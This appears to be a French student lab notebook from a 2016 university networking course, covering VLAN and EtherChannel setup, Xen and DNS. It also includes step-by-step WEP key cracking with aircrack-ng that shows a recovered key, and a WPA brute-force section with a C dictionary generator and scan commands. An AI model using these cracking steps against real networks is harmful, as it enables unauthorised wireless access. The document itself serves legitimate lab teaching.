Cahier 2016 groupe n°7 : Différence entre versions
(→Serveur DNS et DNSSEC avec bind) |
(→Craquage de clé WPA) |
||
Ligne 159 : | Ligne 159 : | ||
===Craquage de clé WPA=== | ===Craquage de clé WPA=== | ||
+ | |||
+ | Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute. | ||
+ | |||
+ | Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant : | ||
+ | |||
+ | #include <stdio.h> | ||
+ | #include <stdlib.h> | ||
+ | |||
+ | #define MAX_NUM 99999999 | ||
+ | |||
+ | int main(){ | ||
+ | long chiffre = 0; | ||
+ | FILE* fp = NULL; | ||
+ | fp = fopen("dictionnaire.txt","a+"); | ||
+ | if (fp != NULL){ | ||
+ | for (chiffre=0;chiffre< MAX_NUM + 1;chiffre++) | ||
+ | { | ||
+ | fprintf(fp,"%08li\n",chiffre); | ||
+ | } | ||
+ | fclose(fp); | ||
+ | } | ||
+ | return 0; | ||
+ | } | ||
+ | |||
+ | Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : | ||
+ | |||
+ | 1. On bascule l'interface wifi en mode monitor : | ||
+ | airmon-ng start wlan2 | ||
+ | |||
+ | 2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA : | ||
+ | airodump-ng --encrypt WPA wlan2 | ||
+ | |||
+ | On obtient le résultat suivant : | ||
+ | |||
+ | 00:19:07:C5:0F:A4 -44 7 8 2 1 54e. WPA2 CCMP MGT PolytechLille | ||
+ | 00:19:07:C5:0F:A2 -48 5 0 0 1 54e. WPA2 CCMP PSK <length: 1> | ||
+ | 00:19:07:C5:0F:A5 -48 6 0 0 1 54e. WPA2 CCMP PSK <length: 1> | ||
+ | 00:19:07:C5:0F:A3 -50 7 0 0 1 54e. WPA2 CCMP PSK PolytechGuests | ||
+ | 00:19:07:C5:0F:A1 -50 7 0 0 1 54e. WPA2 CCMP MGT <length: 1> | ||
+ | 00:19:07:C5:0F:A7 -52 6 0 0 1 54e. WPA2 CCMP MGT PolytechLilleStaff | ||
+ | 00:19:07:C5:0F:A6 -52 5 0 0 1 54e. WPA2 CCMP MGT <length: 1> | ||
+ | 00:19:07:C5:0F:A0 -54 6 2 0 1 54e. WPA2 CCMP MGT LILLE1 | ||
+ | 00:19:07:C5:0F:A8 -55 5 5 0 1 54e. WPA2 CCMP MGT eduroam | ||
+ | 04:DA:D2:9C:50:53 -62 5 0 0 13 54e. WPA2 CCMP PSK cracotte04 | ||
+ | 04:DA:D2:9C:50:52 -66 4 0 0 13 54e. WPA2 CCMP PSK cracotte03 | ||
+ | 04:DA:D2:9C:50:58 -66 4 0 0 13 54e. WPA2 CCMP PSK cracotte09 | ||
+ | 04:DA:D2:9C:50:50 -66 5 0 0 13 54e. WPA2 CCMP PSK cracotte01 | ||
+ | 04:DA:D2:9C:50:55 -65 6 0 0 13 54e. WPA2 CCMP PSK cracotte06 | ||
+ | 04:DA:D2:9C:50:56 -65 3 0 0 13 54e. WPA2 CCMP PSK cracotte07 | ||
+ | 04:DA:D2:9C:50:59 -67 4 0 0 13 54e. WPA2 CCMP PSK cracotte10 | ||
+ | 04:DA:D2:9C:50:54 -67 4 0 0 13 54e. WPA2 CCMP PSK cracotte05 | ||
+ | 04:DA:D2:9C:50:57 -66 4 0 0 13 54e. WPA2 CCMP PSK cracotte08 | ||
+ | 04:DA:D2:9C:50:51 -67 4 0 0 13 54e. WPA2 CCMP PSK cracotte02 | ||
+ | 04:DA:D2:CF:01:91 -69 2 0 0 5 54e. WPA2 CCMP MGT <length: 1> | ||
+ | C8:00:84:84:00:53 -70 3 0 0 9 54e. WPA2 CCMP PSK PolytechGuests | ||
+ | C8:00:84:84:00:52 -71 4 0 0 9 54e. WPA2 CCMP PSK <length: 1> | ||
+ | 04:DA:D2:CF:01:98 -70 2 0 0 5 54e. WPA2 CCMP MGT eduroam | ||
+ | 04:DA:D2:CF:01:90 -71 3 0 0 5 54e. WPA2 CCMP MGT LILLE1 | ||
+ | 04:DA:D2:CF:01:95 -72 2 0 0 5 54e. WPA2 CCMP PSK <length: 1> | ||
+ | 04:DA:D2:CF:01:97 -72 2 0 0 5 54e. WPA2 CCMP MGT PolytechLilleStaff | ||
+ | 04:DA:D2:CF:01:96 -72 2 0 0 5 54e. WPA2 CCMP MGT <length: 1> |
Version du 7 novembre 2016 à 11:28
Sommaire
Cahier des charges
Mise en réseau des commutateurs 6006 en E304
Avancement du travail
Configuration du 6006
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :
1 Switch-E304>enable 2 Switch-E304#vlan database 3 Switch-E304(vlan)#vlan x name nameX 4 Switch-E304(vlan)#exit
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :
1 Switch-E304>enable 2 Switch-E304#conf t 3 Switch-E304(config)#interface GigabitEthernet 4/x 4 Switch-E304(config-if)#switchport 5 Switch-E304(config-if)#switchport access vlan x 6 Switch-E304(config-if)#no shutdown 7 Switch-E304(config-if)#end 8 Switch-E304#write memory (enregistrer la configuration)
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :
5 Switch-E304(config-if)#switchport mode trunk
Installation de xen
xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --dir=/usr/local/xen --gateway=193.48.57.172
Configuration d'une EtherChannel
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.
Voici la commande à rentrer dans l'interface de configuration du commutateur :
1 Switch-E304>enable 2 Switch-E304#conf t 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32 4 Switch-E304(config-if)#switchport 5 Switch-E304(config-if)#switchport mode trunk 6 Switch-E304(config-if)#channel-protocol lacp 7 Switch-E304(config-if)#channel-group 1 mode passive 8 Switch-E304(config-if)#no shutdown 9 Switch-E304(config-if)#end 10 Switch-E304#write memory (enregistrer la configuration)
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.
Serveur DNS et DNSSEC avec bind
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi. Il faut alors se diriger sur la rubrique :Gérer les Glue records. A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :
nom du serveur : ns.bielloumutherfucker.space
IP : 193.48.57.167
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique modifier les serveurs DNS :
DNS1 : ns.bielloumutherfucker.space
DNS2 : ns6.gandi.net (serveur secondaire de Gandi)
...
Crackage de clé WEP
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP. Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2
On obtient l'écran suivant :
CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:CF:01:94 -74 0 0 0 -1 -1 PolytechLille 04:DA:D2:9C:50:57 -62 1 6 2 2 54e. WEP WEP cracotte08 04:DA:D2:9C:50:56 -67 2 0 0 2 54e. WEP WEP cracotte07 04:DA:D2:9C:50:54 -66 1 5 2 2 54e. WEP WEP cracotte05 04:DA:D2:9C:50:52 -63 1 80 38 2 54e. WEP WEP cracotte03 04:DA:D2:9C:50:53 -61 0 24 11 2 -1 WEP WEP <length: 0> 04:DA:D2:9C:50:55 -68 1 14 6 2 54e. WEP WEP cracotte06 04:DA:D2:9C:50:50 -60 0 73 35 2 -1 WEP WEP <length: 0> 04:DA:D2:9C:50:51 -63 1 52 25 2 54e. WEP WEP cracotte02 44:AD:D9:5F:87:00 -42 3 1 0 3 54e. WEP WEP40 Wolverine BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:CF:01:94 00:0C:E7:91:C1:7D -56 1e- 1e 0 13 04:DA:D2:9C:50:57 00:0F:B5:92:22:66 -68 54e-11e 15 5 04:DA:D2:9C:50:54 00:0F:B5:92:23:74 -72 36e- 5e 0 7 04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -60 54e-48e 79 81 04:DA:D2:9C:50:53 00:0F:B5:92:22:68 -64 48e-54e 111 24 04:DA:D2:9C:50:55 00:0F:B5:92:23:6B -66 0 -48e 128 13 04:DA:D2:9C:50:50 00:0F:B5:92:23:75 -62 54e-54e 92 75 04:DA:D2:9C:50:51 00:0F:B5:92:24:51 -60 48e-48e 63 53 (not associated) 9C:2A:83:45:F0:2D -80 0 - 1 0 1 (not associated) 8A:1B:9C:B1:EC:8C -70 0 - 1 5 2 44:AD:D9:5F:87:00 AC:5F:3E:59:90:D5 -40 0 - 1 0 2
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :
airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2
On obtient l'écran suivant :
CH 2 ][ Elapsed: 8 s ][ 2016-03-31 20:30 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:55 -64 0 59 770 64 2 54e. WEP WEP cracotte06 BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:9C:50:55 00:0F:B5:92:23:6B -68 6e-54e 5108 718
Une fois le fichier de capture créé, nous avons exécuter la commande
aircrack cracotte06-01.cap
afin débuter le crackage de la clé WEP.
On obtient le résultat suivant en quelques minutes :
[00:01:53] Tested 279622 keys (got 31535 IVs)
KB depth byte(vote) 0 0/ 1 EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) 1 0/ 1 EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) 2 0/ 1 EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) 3 0/ 1 EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) 4 0/ 1 EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) 5 0/ 1 EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) 6 0/ 1 EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) 7 0/ 2 EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) 8 0/ 1 EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) 9 0/ 3 7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) 10 0/ 1 D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) 11 1/ 1 A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) 12 0/ 1 44(43740) 35(38548) A7(38252) 3A(37560) 88(37560)
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ]
Decrypted correctly: 100%
La clé a été trouver et sa valeur est "EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44"
Craquage de clé WPA
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :
#include <stdio.h> #include <stdlib.h>
#define MAX_NUM 99999999
int main(){ long chiffre = 0; FILE* fp = NULL; fp = fopen("dictionnaire.txt","a+"); if (fp != NULL){ for (chiffre=0;chiffre< MAX_NUM + 1;chiffre++) { fprintf(fp,"%08li\n",chiffre); } fclose(fp); } return 0; }
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA :
1. On bascule l'interface wifi en mode monitor :
airmon-ng start wlan2
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :
airodump-ng --encrypt WPA wlan2
On obtient le résultat suivant :
00:19:07:C5:0F:A4 -44 7 8 2 1 54e. WPA2 CCMP MGT PolytechLille 00:19:07:C5:0F:A2 -48 5 0 0 1 54e. WPA2 CCMP PSK <length: 1> 00:19:07:C5:0F:A5 -48 6 0 0 1 54e. WPA2 CCMP PSK <length: 1> 00:19:07:C5:0F:A3 -50 7 0 0 1 54e. WPA2 CCMP PSK PolytechGuests 00:19:07:C5:0F:A1 -50 7 0 0 1 54e. WPA2 CCMP MGT <length: 1> 00:19:07:C5:0F:A7 -52 6 0 0 1 54e. WPA2 CCMP MGT PolytechLilleStaff 00:19:07:C5:0F:A6 -52 5 0 0 1 54e. WPA2 CCMP MGT <length: 1> 00:19:07:C5:0F:A0 -54 6 2 0 1 54e. WPA2 CCMP MGT LILLE1 00:19:07:C5:0F:A8 -55 5 5 0 1 54e. WPA2 CCMP MGT eduroam 04:DA:D2:9C:50:53 -62 5 0 0 13 54e. WPA2 CCMP PSK cracotte04 04:DA:D2:9C:50:52 -66 4 0 0 13 54e. WPA2 CCMP PSK cracotte03 04:DA:D2:9C:50:58 -66 4 0 0 13 54e. WPA2 CCMP PSK cracotte09 04:DA:D2:9C:50:50 -66 5 0 0 13 54e. WPA2 CCMP PSK cracotte01 04:DA:D2:9C:50:55 -65 6 0 0 13 54e. WPA2 CCMP PSK cracotte06 04:DA:D2:9C:50:56 -65 3 0 0 13 54e. WPA2 CCMP PSK cracotte07 04:DA:D2:9C:50:59 -67 4 0 0 13 54e. WPA2 CCMP PSK cracotte10 04:DA:D2:9C:50:54 -67 4 0 0 13 54e. WPA2 CCMP PSK cracotte05 04:DA:D2:9C:50:57 -66 4 0 0 13 54e. WPA2 CCMP PSK cracotte08 04:DA:D2:9C:50:51 -67 4 0 0 13 54e. WPA2 CCMP PSK cracotte02 04:DA:D2:CF:01:91 -69 2 0 0 5 54e. WPA2 CCMP MGT <length: 1> C8:00:84:84:00:53 -70 3 0 0 9 54e. WPA2 CCMP PSK PolytechGuests C8:00:84:84:00:52 -71 4 0 0 9 54e. WPA2 CCMP PSK <length: 1> 04:DA:D2:CF:01:98 -70 2 0 0 5 54e. WPA2 CCMP MGT eduroam 04:DA:D2:CF:01:90 -71 3 0 0 5 54e. WPA2 CCMP MGT LILLE1 04:DA:D2:CF:01:95 -72 2 0 0 5 54e. WPA2 CCMP PSK <length: 1> 04:DA:D2:CF:01:97 -72 2 0 0 5 54e. WPA2 CCMP MGT PolytechLilleStaff 04:DA:D2:CF:01:96 -72 2 0 0 5 54e. WPA2 CCMP MGT <length: 1>